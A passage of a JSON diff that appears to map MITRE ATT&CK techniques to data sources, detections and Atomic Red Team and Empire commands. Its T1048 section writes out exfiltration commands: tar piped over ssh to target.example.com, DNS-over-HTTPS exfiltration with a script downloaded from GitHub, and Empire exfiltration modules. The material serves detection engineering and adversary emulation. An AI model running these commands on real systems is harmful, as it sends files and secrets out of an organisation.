PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1048", + "command_list": [ + "ssh target.example.com \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", + "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'\n", + "tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'\n", + "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'\n", + "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p atomic -doh #{doh} -t #{time} #{encoding}\n", + "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d target.example.com -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "Import-Module $env:Temp\\dnsexfil.ps1\nInvoke-DNSExfiltrator -i $env:Temp\\dnsexfil.ps1 -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh google -t #{time} #{encoding}\n", + null, + "powershell/exfiltration/exfil_dropbox", + "exfiltration/Invoke_ExfilDataToGitHub" + ], + "commands": [ + { + "command": "ssh target.example.com \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p atomic -doh #{doh} -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d target.example.com -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module $env:Temp\\dnsexfil.ps1\nInvoke-DNSExfiltrator -i $env:Temp\\dnsexfil.ps1 -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh google -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": null, + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "powershell/exfiltration/exfil_dropbox", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "exfiltration/Invoke_ExfilDataToGitHub", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1048", + "display_name": "Exfiltration Over Alternative Protocol", + "atomic_tests": [ + { + "name": "Exfiltration Over Alternative Protocol - SSH", + "auto_generated_guid": "f6786cc8-beda-4915-a4d6-ac2f193bb988", + "description": "Input a domain and test Exfiltration over SSH\n\nRemote to Local\n\nUpon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "domain": { + "description": "target SSH domain", + "type": "Url", + "default": "target.example.com" + } + }, + "executor": { + "command": "ssh #{domain} \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", + "name": "sh" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - SSH", + "auto_generated_guid": "7c3cb337-35ae-4d06-bf03-3032ed2ec268", + "description": "Input a domain and test Exfiltration over SSH\n\nLocal to Remote\n\nUpon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "user_name": { + "description": "username for domain", + "type": "String", + "default": "atomic" + }, + "password": { + "description": "password for user", + "type": "String", + "default": "atomic" + }, + "domain": { + "description": "target SSH domain", + "type": "Url", + "default": "target.example.com" + } + }, + "executor": { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'\n", + "name": "sh" + } + }, + { + "name": "DNSExfiltration (doh)", + "auto_generated_guid": "c943d285-ada3-45ca-b3aa-7cd6500c6a48", + "description": "DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.\n!!! Test will fail without a domain under your control with A record and NS record !!! \nSee this github page for more details - https://github.com/Arno0x/DNSExfiltrator\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "password": { + "description": "Password used to encrypt the data to be exfiltrated", + "type": "String", + "default": "atomic" + }, + "domain": { + "description": "The domain name to use for DNS requests", + "type": "String", + "default": "target.example.com" + }, + "ps_module": { + "description": "DNSExfiltrator powershell ps_module", + "type": "Path", + "default": "$env:Temp\\dnsexfil.ps1" + }, + "doh": { + "description": "Google or CloudFlare DoH (DNS over HTTP) server", + "type": "String", + "default": "google" + }, + "time": { + "description": "The time in milliseconds to wait between each DNS request", + "type": "String", + "default": 500 + }, + "encoding": { + "description": "Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})\n", + "prereq_command": "if (Test-Path #{ps_module}) {exit 0} else {exit 1}\n", + "get_prereq_command": "IWR \"https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1\" -OutFile #{ps_module}\n" + } + ], + "executor": { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "name": "powershell" + } + } + ] + }, + { + "Empire Module": "powershell/exfiltration/exfil_dropbox", + "ATT&CK Technique #1": "T1048", + "ATT&CK Technique #2": "T1071", + "Technique": "Exfiltration Over Alternative Protocol", + "Concatenate for Python Dictionary": "\"powershell/exfiltration/exfil_dropbox\": [\"T1048\",\"T1071\"]," + }, + { + "Empire Module": "exfiltration/Invoke_ExfilDataToGitHub", + "ATT&CK Technique #1": "T1048", + "ATT&CK Technique #2": "", + "Technique": "Exfiltration Over Alternative Protocol", + "Concatenate for Python Dictionary": "\"exfiltration/Invoke_ExfilDataToGitHub\": [\"T1048\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "User interface" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "User interface" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": 